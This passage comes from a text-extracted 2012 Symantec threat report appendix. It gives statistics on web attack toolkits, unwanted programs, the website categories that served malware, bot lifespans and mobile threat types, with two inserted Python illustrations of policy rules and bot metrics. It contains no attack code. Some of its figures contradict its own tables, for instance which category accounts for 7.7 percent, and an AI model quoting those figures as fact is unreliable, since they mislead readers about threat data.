blocks was 49 percent lower than the annual average.<br />
• Further analysis of malicious code activity may be found in<br />
Appendix B: Malicious Code Trends: Overall Top Malicious<br />
Code Families, 2012.
Analysis of Malicious Web Activity by Attack Toolkits<br />
Background<br />
The increasing pervasiveness of Web browser applications,<br />
along with increasingly common, easily exploited Web browser<br />
application <strong>security</strong> vulnerabilities, has resulted in the<br />
widespread growth of Web-based threats. Attackers wanting to<br />
take advantage of client-side vulnerabilities no longer need to<br />
actively compromise specific networks to gain access to those<br />
computers. These attacks work by silently infecting enterprise<br />
and consumer users who visit mainstream websites hosting Web<br />
attack toolkits with a variety of malware.<br />
Symantec analyzes attack activity to determine which types<br />
of attacks and attack toolkits attackers are utilizing. This can<br />
provide insight into emerging Web attack trends and may<br />
indicate the types of attacks with which attackers are having<br />
the most success.<br />
Data<br />
Figure A.9. Malicious Website Activity: Attack Toolkit Trends, 2012<br />
Source: Symantec<br />
[Chart: monthly share of blocked Web attack activity by toolkit family, January to December 2012 (0–90%); series: Blackhole, Sakura, Nuclear, Redkit, Phoenix, Others]<br />
Methodology<br />
This metric assesses the top Web-based attack activity grouped<br />
by exploit “Web kit” families. These attacks originated from<br />
compromised legitimate sites and intentionally malicious sites<br />
set up to target Web users in 2012. To determine this, Symantec<br />
ranked attack activity by the number of incidents<br />
associated with each given Web kit.
Figure A.10. Malicious Website Activity: Overall Frequency of Major Attack Toolkits, 2012<br />
Source: Symantec<br />
[Bar chart: share of attacks blocked from Web attack toolkits in 2012] Blackhole 41% | Sakura 22% | Phoenix 10% | Redkit 7% | Nuclear 3% | Others 17%<br />
Commentary<br />
• Blackhole continues to be the most dominant Web attack kit<br />
in 2012, accounting for 40.7 percent of attacks blocked from<br />
Web attack toolkits, compared with 44.3 percent in 2011.<br />
The Sakura toolkit was ranked second, accounting for 22<br />
percent of attacks blocked, and was not ranked in the top<br />
10 in 2011.<br />
• The Sakura Web attack kit was updated to version 1.1 in<br />
early 2012, and many of the more common attack toolkits<br />
were updated in 2012 to include exploits for the Java<br />
Runtime Environment, including CVE-2012-0507,<br />
CVE-2012-1723, and CVE-2012-4681.<br />
• The Blackhole kit was updated frequently and the code is<br />
highly obfuscated. It is often used to deploy ransomware<br />
and fake <strong>security</strong> software.
Analysis of Web-based Spyware, Adware, and Potentially Unwanted Programs<br />
Background<br />
One of the main goals of a drive-by Web-based installation is the<br />
deployment of malicious code, but often a compromised website<br />
is also used to install spyware or adware code. This is because<br />
the cybercriminals pushing the spyware and adware in this way<br />
are being paid a small fee for each installation. However, adware<br />
vendors, such as those providing add-in toolbars for<br />
Web browsers, are not always aware of how their code came to be<br />
installed on users’ computers. The expectation is that it is<br />
installed with the permission of the end user, which is typically not<br />
the case in a drive-by installation and may be in breach of the<br />
vendors’ terms and conditions of use.<br />
Data<br />
Figure A.11. Potentially Unwanted Programs: Spyware and Adware Blocked, 2012<br />
Source: Symantec.cloud<br />
Rank | Top 10 Potentially Unwanted Programs | %<br />
1 | Application.DirectDownloader.A | 94.2%<br />
2 | Spyware.PcAcme | 1.5%<br />
3 | Adware.Js.Script.C | 0.2%<br />
4 | Application:Android/Counterclank.A | 0.2%<br />
5 | Application.Installcore.E | 0.2%<br />
6 | Adware:W32/CDN.A | 0.2%<br />
7 | Adware.Solimba.C | 0.2%<br />
8 | Spyware.Ardakey | 0.2%<br />
9 | Adware:Android/AirPush.A | 0.2%<br />
10 | Spyware.Keylogger | 0.1%<br />
Methodology<br />
This metric assesses the prevalence of Web-based spyware and<br />
adware activity by tracking the trend in the average number of<br />
spyware and adware related websites blocked each day by users<br />
of Symantec.cloud Web <strong>security</strong> services. Underlying trends<br />
observed in the sample data provide a reasonable representation<br />
of overall malicious Web-based activity trends.
Commentary<br />
• It is sometimes the case that potentially unwanted<br />
programs are legitimate programs that have been<br />
installed as part of a drive-by download, without the<br />
permission of the user. This typically happens when the<br />
third party behind the installation is being rewarded for<br />
the number of installations of a particular program,<br />
irrespective of whether the user has granted permission.<br />
It is often done without the knowledge of the original vendor<br />
and may be in breach of the vendor’s affiliate terms and<br />
conditions.<br />
• The most frequently blocked installation of potentially<br />
unwanted programs in 2012 was for the DirectDownload<br />
software.<br />
• Similarly, Counterclank 2 was ranked fourth in 2012, and was<br />
one of two Android-based potentially unwanted programs<br />
blocked. Due to the combined behavior of the applications<br />
and negative feedback from users who installed the<br />
applications, Symantec attempted to have Counterclank 3<br />
removed from the Android Market in 2012, but Google<br />
replied quickly, informing us that the applications met their<br />
Terms of Service and would not be removed. We expect that in<br />
the future there may be many similar situations where we<br />
will inform users about an application, but the application<br />
will remain in the Google Android Market.<br />
• In 2012, three of the top 10 potentially unwanted programs<br />
were classified as spyware, compared with two in 2011.<br />
• Figure A.11 accounts for approximately 19 percent of all<br />
spyware and adware blocked in 2012. The remainder was<br />
blocked using generic detection techniques.
Analysis of Web Policy Risks from Inappropriate Use<br />
Background<br />
Many organizations implement an acceptable usage policy<br />
to limit employees’ use of Internet resources to a subset of<br />
websites that have been approved for business use. This enables<br />
an organization to limit the level of risk that may arise from<br />
users visiting inappropriate or unacceptable websites, such as<br />
those containing sexual images and other potentially illegal<br />
or harmful content. Often there will be varying degrees of<br />
granularity imposed on such restrictions, with some rules being<br />
applied to groups of users or rules that only apply at certain<br />
times of the day; for example, an organization may wish to<br />
limit employees’ access to video sharing websites to Friday<br />
lunchtime only, but may also allow any member of the PR and<br />
marketing teams access at any time of the day. This enables<br />
an organization to implement and monitor its acceptable usage<br />
policy and reduce its exposure to certain risks that may also<br />
expose the organization to legal difficulties.<br />
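The group- and time-scoped rules described above, as an added Python example (not Symantec.cloud's policy engine): video sharing sites are blocked by default, re-allowed for everyone in a Friday lunchtime window, and re-allowed at any time for PR and marketing staff. The group names, the category label and the 12:00 to 14:00 window are assumptions made for the example.

```python
"""Evaluate acceptable-usage rules that vary by user group and time of day.

Added example, not Symantec.cloud's policy engine. The rule set encodes
the scenario in the text: video sharing websites are blocked for
everyone except during Friday lunchtime, while PR and marketing staff
may reach them at any time. Group names, the category label and the
lunchtime window (12:00-14:00) are constructed for this example.
"""
from dataclasses import dataclass, field
from datetime import datetime, time

FRIDAY = 4  # datetime.weekday(): Monday=0 .. Sunday=6


@dataclass(frozen=True)
class Exemption:
    """Re-allows one restricted category for some users and/or times."""
    category: str
    groups: frozenset = frozenset()            # empty: applies to every user
    weekdays: frozenset = frozenset(range(7))  # default: every day
    start: time = time(0, 0)
    end: time = time(23, 59, 59)

    def applies(self, user_groups, when):
        if self.groups and not (self.groups & user_groups):
            return False
        if when.weekday() not in self.weekdays:
            return False
        return self.start <= when.time() <= self.end


@dataclass
class UsagePolicy:
    """Categories blocked by default plus ordered exemptions."""
    blocked: set = field(default_factory=set)
    exemptions: list = field(default_factory=list)

    def decide(self, category, user_groups, when):
        """Return ("allow" | "block", reason) for one request."""
        if category not in self.blocked:
            return "allow", "category is not restricted"
        for ex in self.exemptions:
            if ex.category == category and ex.applies(frozenset(user_groups), when):
                who = ", ".join(sorted(ex.groups)) or "all users"
                return "allow", f"exemption for {who} {ex.start:%H:%M}-{ex.end:%H:%M}"
        return "block", f"'{category}' is restricted by the acceptable usage policy"


def example_policy():
    return UsagePolicy(
        blocked={"video_sharing"},
        exemptions=[
            # Everyone, but only in the Friday lunchtime window.
            Exemption("video_sharing", weekdays=frozenset({FRIDAY}),
                      start=time(12, 0), end=time(14, 0)),
            # PR and marketing staff, at any time on any day.
            Exemption("video_sharing", groups=frozenset({"pr", "marketing"})),
        ],
    )


def check_request(category, user_groups, when_iso, policy=None):
    """Convenience wrapper: ISO-8601 timestamp in, decision string out."""
    policy = policy or example_policy()
    decision, _reason = policy.decide(category, user_groups, datetime.fromisoformat(when_iso))
    return decision


if __name__ == "__main__":
    # 2012-07-27 was a Friday, 2012-07-30 a Monday.
    for cat, groups, ts in [
        ("video_sharing", {"engineering"}, "2012-07-27T12:30:00"),
        ("video_sharing", {"engineering"}, "2012-07-27T15:00:00"),
        ("video_sharing", {"marketing"}, "2012-07-30T09:00:00"),
        ("news", {"engineering"}, "2012-07-30T09:00:00"),
    ]:
        print(cat, sorted(groups), ts, "->", check_request(cat, groups, ts))
```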
Data<br />
Figure A.12. Web Policies that Triggered Blocks, 2011–2012<br />
Source: Symantec.cloud<br />
Rank | Top 10 Category | 2012 | 2011 | Change<br />
1 | Advertisement and Pop-ups | 31.8% | 46.6% | -14.8%<br />
2 | Social Networking | 24.1% | 22.7% | 1.4%<br />
3 | Streaming Media | 9.0% | 18.9% | -9.9%<br />
4 | Chat | 4.7% | 3.2% | 1.5%<br />
5 | Computing and <strong>Internet</strong> | 4.0%<br />
Methodology
Commentary<br />
• 31.8 percent of Web activity blocked through policy<br />
controls was related to advertisements and pop-ups. Web-based<br />
advertisements pose a potential risk through the use<br />
of “malvertisements,” or malicious advertisements. These<br />
may occur as the result of a legitimate online ad provider<br />
being compromised and a banner ad being used to serve<br />
malware on an otherwise harmless website.<br />
• The second most frequently blocked traffic was categorized<br />
as social networking, accounting for 24.1 percent of<br />
policy-based filtering activity blocked, equivalent to<br />
approximately one in every four websites blocked. Many<br />
organizations allow access to social networking websites,<br />
but in some cases implement policies to only permit access<br />
at certain times of the day and block access at all other<br />
times.<br />
• Activity related to streaming media policies resulted in 9<br />
percent of policy-based filtering blocks in 2012. Streaming<br />
media is increasingly popular when there are major<br />
sporting events or high profile international news stories.<br />
This activity often results in an increased number of blocks,<br />
as businesses seek to preserve valuable bandwidth for other<br />
purposes. This rate is equivalent to one in every 11 websites<br />
blocked. The proportion of streaming media blocks made<br />
in 2012 was half of the 2011 figure, despite the London<br />
Olympics.
Analysis of Website Categories Exploited to Deliver Malicious Code<br />
Background<br />
As organizations seek to implement appropriate levels of control<br />
in order to minimize the risk from uncontrolled Web access, it<br />
is important to understand the level of threat posed by certain<br />
classifications and categories of websites. This gives a<br />
better understanding of the types of legitimate websites that<br />
may be more susceptible to being compromised and could<br />
expose users to greater levels of risk.<br />
Web-based malware is increasingly likely to be found on<br />
a legitimate website that has been compromised and used to<br />
host malicious content. It is therefore increasingly important<br />
that proactive <strong>security</strong> countermeasures are able to block<br />
such malware before it can reach a company’s network. This<br />
technique has also been employed in some targeted attacks,<br />
known as “watering hole” attacks, where the intended victim<br />
is known to frequent a particular website and that website has<br />
been compromised.<br />
Data<br />
Figure A.13. Malicious Web Activity: Categories that Delivered Malicious Code, 2012<br />
Source: Symantec<br />
Rank | Top 10 Most Frequently Exploited Categories of Websites | % of Total Number of Infected Websites<br />
1 | Business | 7.7%<br />
2 | Hacking | 7.6%<br />
3 | Technology and Telecommunication | 5.7%<br />
4 | Blogging | 4.5%<br />
5 | Shopping | 3.6%<br />
6 | Known Malware Domain | 2.6%<br />
7 | Hosting | 2.3%<br />
8 | Automotive | 1.9%<br />
9 | Health | 1.7%<br />
10 | Educational | 1.7%<br />
Methodology<br />
This metric assesses the classification of malicious websites<br />
blocked by users of Norton Safe Web technology. 4 Data is<br />
collected anonymously from over 50 million computers<br />
worldwide, where customers voluntarily contribute to this<br />
technology, including Norton Community Watch. Norton<br />
Safe Web is processing more than two billion real-time rating<br />
requests each day, and monitoring over 12 million daily.<br />
Reputation ratings are being tracked for more than 25 million<br />
websites.<br />
This metric provides an indication of the levels of infection of<br />
legitimate websites that have been compromised or abused for<br />
malicious purposes. The malicious URLs identified by the Safe<br />
Web technology were classified by category using the Symantec<br />
RuleSpace 5 technology. RuleSpace proactively categorizes<br />
websites into more than 80 categories in 17 languages.
Figure A.14. Malicious Web Activity: Malicious Code by Number of Infections Per Site, 2012<br />
Source: Symantec<br />
Rank<br />
Top 10 Potentially Most<br />
Harmful Categories of<br />
Websites<br />
Average Number of<br />
Threats Found on Infected<br />
Website<br />
Major Threat Type<br />
Detected<br />
1 Pornography 4.4 trojans: 82%<br />
2 Placeholder 3.3 Pay Per click: 73%<br />
3 Plagiarism 3.2 Malware: 49%<br />
4 Automotive 3.1 Pay Per click: 66%<br />
5 Gore 3.0 Fake Antivirus: 74%<br />
6 Military 3.0 Malware: 53%<br />
7 Lifestyles 2.8 Fake Antivirus: 53%<br />
8 Automated Web Application 2.8 Malware: 100%<br />
9 Abortion 2.8 Malware: 79%<br />
10 Art and Museums 2.7 Fake Antivirus: 54%<br />
Figure A.15. Malicious Web Activity: Fake Antivirus by Category, 2012<br />
Source: Symantec<br />
Rank | Top 10 Potentially Most Harmful Categories of Websites - Fake Antivirus | % of Fake Antivirus Attacks Found Within Top 10 Categories | % of Threats Found Within Same Category<br />
1 | Religion | 43% | 4%<br />
2 | Sports | 41% | 5%<br />
3 | Shopping | 39% | 18%<br />
4 | Health | 34% | 7%<br />
5 | Business | 29% | 28%<br />
6 | Travel | 29% | 4%<br />
7 | Educational | 22% | 5%<br />
8 | Blogging | 20% | 11%<br />
9 | Technology and Telecommunication | 15% | 10%<br />
10 | Hacking | 9% | 8%<br />
Figure A.16. Malicious Web Activity: Browser Exploits by Category, 2012<br />
Source: Symantec<br />
Rank | Top 10 Potentially Most Harmful Categories of Websites - Browser Exploits | % of Browser Exploits Found Within Top 10 Categories | % of Threats Found Within Same Category<br />
1 | Anonymizer | 32% | 8%<br />
2 | Blogging | 30% | 61%<br />
3 | Known Malware Domain | 6% | 7%<br />
4 | Dynamic | 4% | 2%<br />
5 | Hosting | 4% | 4%<br />
6 | Hacking | 2% | 8%<br />
7 | Educational | 2% | 1%<br />
8 | Business | 1% | 5%<br />
9 | Technology and Telecommunication | 1% | 3%<br />
10 | Shopping | 1% | 1%<br />
Figure A.17. Malicious Web Activity: Social Networking Attacks by Category, 2012<br />
Source: Symantec<br />
Rank | Top 10 Potentially Most Harmful Categories of Websites - Social Networking | % Used to Deliver Social Networking Attacks<br />
1 | Blogging | 43%<br />
2 | Hacking | 14%<br />
3 | Dynamic | 11%<br />
4 | Business | 5%<br />
5 | Hosting | 4%<br />
Commentary<br />
• Approximately 63 percent of websites used to distribute<br />
malware were identified as legitimate, compromised<br />
websites that could be classified, an increase of two<br />
percentage points compared with 2011. This figure excludes<br />
URLs that contained just an IP address and did not include<br />
general domain parking and pay-per-click websites.<br />
• 7.7 percent of malicious website activity was classified in<br />
the Blogging category.<br />
• Websites classified as pornography were found to host the<br />
greatest number of threats per site of any category,<br />
with an average of 4.4 threats per website, the majority of<br />
which related to Trojans (82 percent).<br />
• Analysis of websites that were used to deliver drive-by fake<br />
antivirus attacks revealed that 4 percent of threats found<br />
on compromised religion sites were related to fake antivirus<br />
software. 43 percent of fake antivirus attacks were found on<br />
compromised religion sites. 28 percent of attacks found on<br />
compromised business sites were fake antivirus.<br />
• Analysis of websites that were used to deliver attacks using<br />
browser exploits revealed that 8 percent of threats found<br />
on compromised anonymizer sites were related to browser<br />
exploits. 32 percent of browser exploit attacks were found<br />
on compromised anonymizer sites. 59 percent of browser<br />
exploits were found on compromised blogging sites.<br />
• 43 percent of attacks used on social networking websites<br />
were related to malware hosted on compromised blogging<br />
sites. This is where a URL hyperlink for a compromised<br />
website is shared on a social network. Websites dedicated to<br />
the discussion of hacking accounted for 14 percent of social<br />
networking attacks.<br />
• The Hacking category is used to classify websites<br />
that promote or provide the means to practice illegal<br />
or unauthorized acts of computer crime or related<br />
programming skills.<br />
• The Dynamic category is used to classify websites that have<br />
been found to contain both appropriate and inappropriate<br />
user-generated content, such as social networking or<br />
blogging websites. Also, websites in which the page content<br />
changes based on how the user is interacting with it<br />
(for example, an Internet search).<br />
• The Known Malware Domain category covers sites that have<br />
no specific broad classification, but where the domain<br />
was found to either contain malware or take advantage of<br />
other exploits to deliver adware, spyware or malware. For<br />
example, underground websites that may be used to openly<br />
discuss and share malcode and related research.<br />
• The Placeholder category refers to any domain name that is<br />
registered, but may be for sale or has recently expired and<br />
is redirected to a domain parking page.
Bot-infected Computers<br />
Background<br />
Bot-infected computers, or bots, are programs that are covertly<br />
installed on a user’s machine in order to allow an attacker to<br />
control the targeted system remotely through a communication<br />
channel, such as Internet relay chat (IRC), P2P, or HTTP. These<br />
channels allow the remote attacker to control a large number<br />
of compromised computers over a single, reliable channel in a<br />
botnet, which can then be used to launch coordinated attacks.<br />
Bots allow for a wide range of functionality and most can be<br />
updated to assume new functionality by downloading new code<br />
and features. Attackers can use bots to perform a variety of<br />
tasks, such as setting up denial-of-service (DoS) attacks against<br />
an organization’s website, distributing spam and phishing<br />
attacks, distributing spyware and adware, propagating malicious<br />
code, and harvesting confidential information that may be used<br />
in identity theft from compromised computers—all of which<br />
can lead to serious financial and legal consequences. Attackers<br />
favor bot-infected computers with a decentralized C&C model<br />
because they are difficult to disable and allow the attackers to<br />
hide in plain sight among the massive amounts of unrelated<br />
traffic occurring over the same communication channels, such<br />
as P2P. Most importantly, botnet operations can be lucrative for<br />
their controllers because bots are also inexpensive and relatively<br />
easy to propagate.<br />
Methodology<br />
A bot-infected computer is considered active on a given day if<br />
it carries out at least one attack on that day. This does not have<br />
to be continuous; rather, a single such computer can be active<br />
on a number of different days. A distinct bot-infected computer<br />
is a distinct computer that was active at least once during the<br />
period. The bot-infected computer activities that Symantec<br />
tracks can be classified as actively attacking bots or bots<br />
that send out spam (for example, spam zombies).<br />
Distributed denial-of-service (DDoS) campaigns are not always<br />
indicative of bot-infected computer activity; DDoS activity can<br />
occur without the use of bot-infected computers. For example,<br />
systems that participated in the high-profile DDoS Operation<br />
Payback attacks in 2010 and 2011 used publicly available<br />
software such as Low Orbit Ion Cannon (LOIC) in a coordinated<br />
effort to disrupt the website operations of many businesses. Users<br />
sympathetic to the Anonymous cause could voluntarily<br />
download the free tool from the Web and participate en masse in<br />
a coordinated DDoS campaign; doing so required very little technical<br />
knowledge.<br />
The analysis reveals the average lifespan of a bot-infected<br />
computer for the highest populations of bot-infected computers.<br />
To be included on the list, the geography must account for at<br />
least 0.1 percent of the global bot population.
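The daily-activity, distinct-bot and 0.1 percent rules described above, worked through on constructed data. This is an added example, not Symantec's own tooling: the attack sightings, the bot identifiers, the placeholder geography "Elbonia", and the definition of lifespan as the inclusive span between a bot's first and last active day are all assumptions.<br />

```python
"""Bot lifespan metric per the Methodology above, on constructed sample data.

Added illustration, not Symantec's tooling. The lifespan formula (inclusive
days from first to last active day) is an assumption; the report does not
spell one out.
"""
from collections import defaultdict
from datetime import date, timedelta

MIN_SHARE_OF_WORLD_BOTS = 0.001  # geographies below 0.1% of world bots are not listed


def build_sample_sightings():
    """Constructed attack sightings as (bot_id, geography, day). Not real data."""
    sightings = [
        # Romania: two attacks on one day are ONE active day, and a bot seen again
        # weeks later is the same distinct bot, so its lifespan spans the gap.
        ("ro-1", "Romania", date(2012, 3, 1)),
        ("ro-1", "Romania", date(2012, 3, 1)),
        ("ro-1", "Romania", date(2012, 3, 24)),
        ("ro-2", "Romania", date(2012, 4, 10)),
        # United States: a large population, almost all cleaned up within a day.
        ("us-a", "United States", date(2012, 5, 2)),
        ("us-a", "United States", date(2012, 5, 14)),
        ("us-b", "United States", date(2012, 6, 1)),
        ("us-b", "United States", date(2012, 6, 3)),
        ("us-b", "United States", date(2012, 6, 4)),
        # Elbonia (placeholder geography): one long-lived bot, but too small a
        # share of the world population to be ranked.
        ("el-1", "Elbonia", date(2012, 7, 1)),
        ("el-1", "Elbonia", date(2012, 7, 30)),
    ]
    start = date(2012, 6, 1)
    for i in range(1498):  # 1,498 single-day US bots, generated deterministically
        sightings.append((f"us-{i}", "United States", start + timedelta(days=i % 30)))
    return sightings


def bot_lifespans(sightings):
    """Map bot_id -> (geography, lifespan_days).

    A bot is active on a day if it carried out at least one attack that day;
    active days need not be consecutive, and each bot is counted once however
    often it is seen.
    """
    active_days = defaultdict(set)
    geography_of = {}
    for bot_id, geography, day in sightings:
        active_days[bot_id].add(day)
        geography_of[bot_id] = geography
    return {
        bot_id: (geography_of[bot_id], (max(days) - min(days)).days + 1)
        for bot_id, days in active_days.items()
    }


def rank_geographies(sightings, min_share=MIN_SHARE_OF_WORLD_BOTS):
    """Return [(geography, avg_lifespan_days, share_of_world_bots)] ranked by
    average lifespan, keeping only geographies with at least min_share of the
    distinct bots seen in the period."""
    lifespans = bot_lifespans(sightings)
    total_bots = len(lifespans)
    per_geography = defaultdict(list)
    for geography, days in lifespans.values():
        per_geography[geography].append(days)
    rows = []
    for geography, spans in per_geography.items():
        share = len(spans) / total_bots
        if share < min_share:
            continue  # below the 0.1 percent threshold
        rows.append((geography, round(sum(spans) / len(spans), 2), round(share, 4)))
    rows.sort(key=lambda row: (-row[1], row[0]))
    return rows


if __name__ == "__main__":
    for geography, avg_days, share in rank_geographies(build_sample_sightings()):
        print(f"{geography:15s} avg lifespan {avg_days:6.2f} days  share {share:.2%}")
```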
Data<br />
Figure A.18. Table of Top 10 Bot Locations by Average Lifespan of Bot, 2011–2012<br />
Source: Symantec<br />
Rank - 2012 | Geography | Average Lifespan of Bot (Days) - 2012 | % of World Bots - 2012 | Average Lifespan of Bot (Days) - 2011 | % of World Bots - 2011 | Rank - 2011<br />
1 | Romania | 24 | 0.16% | 29 | 0.14% | 1<br />
2 | Bulgaria | 17 | 0.10% | 14 | 0.13% | 2<br />
3 | United States | 13 | 15.34% | 13 | 12.56% | 3<br />
4 | Indonesia | 12 | 0.12% | 10 | 0.14% | 6<br />
5 | Israel | 11 | 1.34% | 5 | 1.64% | 29<br />
6 | Egypt | 10 | 0.11% | 8 | 0.11% | 14<br />
7 | Korea, South | 10 | 0.99% | 12 | 0.99% | 4<br />
8 | Pakistan | 10 | 0.12% | 9 | 0.25% | 10<br />
9 | Philippines | 10 | 0.16% | 10 | 0.18% | 6<br />
10 | Ukraine | 10 | 0.15% | 10 | 0.20% | 6<br />
Commentary<br />
• Bots located in Romania were active for an average of 24 days in 2012, compared with 29 days in 2011; 1 in 622 bots were located in Romania, compared with 1 in 737 in 2011.<br />
• It takes almost twice as long to identify and clean up a bot-infected computer in Romania as in the United States, although the number of infections in the United States is more than a hundred times greater than that of Romania. One factor contributing to this disparity may be a low level of user awareness of the issues involved, combined with the lower availability of remediation guidance and support tools in the Romanian language.<br />
• In the United States, which was home to 1 in 7 (15 percent) of global bot-infected computers, the average lifespan for a bot was 13 days, unchanged from 2011.<br />
• All other countries outside the top ten had a lifespan of 9 days or less. The overall average lifespan was 6 days.<br />
• Additionally, 68 percent of bots were controlled using HTTP-based command and control channels, compared with 65 percent in 2011.<br />
Analysis of Mobile Threats<br />
Background<br />
Since the first smartphone arrived in the hands of consumers,<br />
speculation about threats targeting these devices has abounded.<br />
While threats targeted early “smart” devices such as those based<br />
on Symbian and Palm OS in the past, none of these threats<br />
ever became widespread and many remained proof of concept.<br />
Recently, with the growing uptake in smartphones and tablets,<br />
and their increasing connectivity and capability, there has<br />
been a corresponding increase in attention, both from threat<br />
developers and <strong>security</strong> researchers.<br />
While the number of immediate threats to mobile devices<br />
remains relatively low in comparison to threats targeting PCs,<br />
there have been new developments in the field. And as malicious<br />
code for mobile begins to generate revenue for malware authors,<br />
there will be more threats created for these devices, especially as<br />
people increasingly use mobile devices for sensitive transactions<br />
such as online shopping and banking.<br />
As with desktop computers, the exploitation of a vulnerability<br />
can be a way for malicious code to be installed on a mobile device.<br />
Data<br />
Figure A.19. Android Mobile Threats: Newly Discovered Malicious Code, 2011–2012<br />
Source: Symantec<br />
[Chart: newly discovered Android malicious code per month with a trend line; x-axis JAN 2011 to OCT 2012 by quarter, y-axis 0–24. Values are not reproduced in the extracted text.]<br />
Methodology<br />
In 2012, a significant number of vulnerabilities affecting<br />
mobile devices was reported. Symantec documented<br />
415 vulnerabilities in mobile device operating systems in 2012,<br />
compared to 315 in 2011 and 163 in 2010; an increase of 32<br />
percent over 2011.<br />
Symantec tracks the number of threats discovered against<br />
mobile platforms by tracking malicious threats identified by<br />
Symantec’s own <strong>security</strong> products and confirmed vulnerabilities<br />
documented by mobile vendors.<br />
Currently, most malicious code for mobile devices consists of<br />
Trojans that pose as legitimate applications. These applications<br />
are uploaded to mobile application (“app”) marketplaces in the<br />
hope that users will download and install them, often trying to<br />
pass themselves off as legitimate apps or games. Attackers have<br />
also taken popular legitimate applications and added additional<br />
code to them. Symantec has classified the types of threats into a<br />
variety of categories based on their functionality.<br />
Figure A.20. Android Mobile Threats: Cumulative Number of Malware Families, 2010–2012<br />
Source: Symantec<br />
[Chart: cumulative number of Android malware families; x-axis JAN 2011 to DEC 2012, y-axis 0–200. Values are not reproduced in the extracted text.]<br />
Figure A.21. Mobile Threats: Malicious Code by Type, 2012<br />
Source: Symantec<br />
[Pie chart of mobile malicious code by primary risk type. The labels Steal Information, Traditional Threats and Track User and the values 32%, 25% and 15% appear in the extracted text, but their pairing is not recoverable.]<br />
Figure A.22. Mobile Threats: Malicious Code by Type – Additional Detail, 2012<br />
Source: Symantec<br />
[Bar chart by subcategory: Steals Device Data, Spies on User, Sends Premium SMS, Downloader, Back Door, Tracks Location, Modifies Settings, Spam, Steals Media, Elevates Privileges, Banking Trojan, SEO Poisoning, Adware/Annoyance, DDoS Utility, Hacktool. Steals Device Data is the largest bar; values are not reproduced.]<br />
Figure A.23. Documented Mobile Vulnerabilities, 2012<br />
Source: Symantec<br />
[Bar chart of documented mobile vulnerabilities per month in 2012, y-axis 0–140. The first four bars are labelled Jan 9, Feb 46, Mar 121 and Apr 18; the remaining monthly values cannot be reliably paired with their months in the extracted text.]<br />
Platform | Documented Vulnerabilities | %<br />
Apple iOS/iPhone/iPad | 387 | 93.3%<br />
Android | 13 | 3.1%<br />
BlackBerry | 13 | 3.1%<br />
Nokia | 0 | 0%<br />
webOS | 0 | 0%<br />
Windows Mobile | 2 | 0.5%<br />
TOTAL | 415 |<br />
The following are specific definitions of each subcategory:<br />
• Collects Device Data gathers information that is specific<br />
to the functionality of the device, such as IMEI, IMSI,<br />
operating system, and phone configuration data.<br />
• Spies on User intentionally gathers information from the<br />
device in order to monitor a user, such as phone logs and SMS<br />
messages, and sends them to a remote source.<br />
• Sends Premium SMS sends SMS messages to premium-rate<br />
numbers that are charged to the user’s mobile account.<br />
• Downloader can download other risks on to the<br />
compromised device.<br />
• Back door opens a back door on the compromised device,<br />
allowing attackers to perform arbitrary actions.<br />
• Tracks Location gathers GPS information from the device<br />
specifically to track the user’s location.<br />
• Modifies Settings changes configuration settings on the<br />
compromised device.<br />
• Spam sends spam email messages from the compromised<br />
device.<br />
• Steals Media sends media, such as pictures, to a remote<br />
source.<br />
• Elevates Privileges attempts to gain privileges beyond those<br />
laid out when installing the app bundled with the risk.<br />
• Banking Trojan monitors the device for banking<br />
transactions, gathering the sensitive details for further<br />
malicious actions.<br />
• SEO Poisoning periodically sends the phone’s browser to<br />
predetermined URLs in order to boost search rankings.<br />
• Adware/Annoyance contains mobile adware that uses<br />
techniques to place advertising in the device’s photo<br />
albums and calendar entries, and may push messages to the<br />
notification bar. It may even replace the default ringtone<br />
with an ad.<br />
Apps with malicious intentions can present serious risks to<br />
users of mobile devices. These metrics show the different<br />
functions that these bad mobile apps performed during the<br />
year. The data was compiled by analyzing the key functionality<br />
of malicious mobile apps. Symantec has identified five primary<br />
mobile risk types:<br />
• Collect Data. Most common among bad mobile apps was the<br />
collection of data from the compromised device. This was<br />
typically done with the intent to carry out further malicious<br />
activities, in much the way an information-stealing Trojan<br />
might. This includes both device- and user-specific data,<br />
ranging from configuration data to banking details. This<br />
information can be used in a number of ways, but for the<br />
most part, it is fairly innocuous with IMEI 7 and IMSI 8<br />
numbers taken by attackers as a way to uniquely identify<br />
a device. More concerning is data gathered about the<br />
device software, such as operating system (OS) version or<br />
applications installed, to carry out further attacks (say, by<br />
exploiting a software vulnerability). Rarer, but of greatest<br />
concern, is when user-specific data, such as banking<br />
details, is gathered in an attempt to make unauthorized<br />
transactions. While this category covers a broad range of<br />
data, the distinction between device and user data is given<br />
in more detail in the subcategories below.<br />
• Track User. The next most common purpose was to track a<br />
user’s personal behavior and actions. These risks take data<br />
specifically to spy on the individual using the phone. This<br />
is done by gathering up various communication data, such<br />
as SMS messages and phone call logs, and sending them to<br />
another computer or device. In some instances they may<br />
even record phone calls. In other cases these risks track GPS<br />
coordinates, essentially keeping tabs on the location of the<br />
device (and its user) at any given time. Gathering pictures<br />
taken with the phone also falls into this category.<br />
• Send Content. The third-largest group of risks is bad apps<br />
that send out content. These risks are different from the<br />
first two categories because their direct intent is to make<br />
money for the attacker. Most of these risks will send a text<br />
message to a premium SMS number, ultimately appearing<br />
on the mobile bill of the device’s owner. Also within this<br />
category are risks that can be used as email spam relays,<br />
controlled by the attackers and sending unwanted emails<br />
from addresses registered to the device. One threat in this<br />
category constantly sent HTTP requests in the hopes of<br />
bumping certain pages within search rankings.<br />
• Traditional Threats. The fourth group contains more<br />
traditional threats, such as back doors and downloaders.<br />
Attackers often port these types of risks from PCs to mobile<br />
devices.<br />
• Change Settings. Finally, there are a small number of risks<br />
that focus on making configuration changes. These types<br />
attempt to elevate privileges or simply modify various<br />
settings within the operating system. The goal for this<br />
final group seems to be to perform further actions on the<br />
compromised devices.
Commentary<br />
In 2012, Android users especially were potentially vulnerable to<br />
a wider variety of threats, predominantly due to the widespread<br />
popularity of the Android platform. However, very few of these<br />
threats have utilized vulnerabilities in the Android OS in order<br />
to spread. Rather, the threats tend to masquerade as legitimate<br />
apps and attempt to coerce the user into installing them.<br />
Exploits accounted for a minority of the infections, but there<br />
are certainly more of them for older platforms (for example,<br />
2.x.x), so a lot of these users were more vulnerable to malicious<br />
apps that carry these exploits and use them to obtain “root”<br />
super-user privileges (examples of threats that do this include<br />
Basebridge, Bmaster, Gonfu.D, Gmaster, and Zeahache).<br />
There are two important distinctions between older and newer<br />
Android versions regarding <strong>security</strong> features:<br />
• In response to feedback from users annoyed by advertising<br />
platforms that push notifications to the status bar, Google<br />
added a feature in 4.x to identify the app that generates a<br />
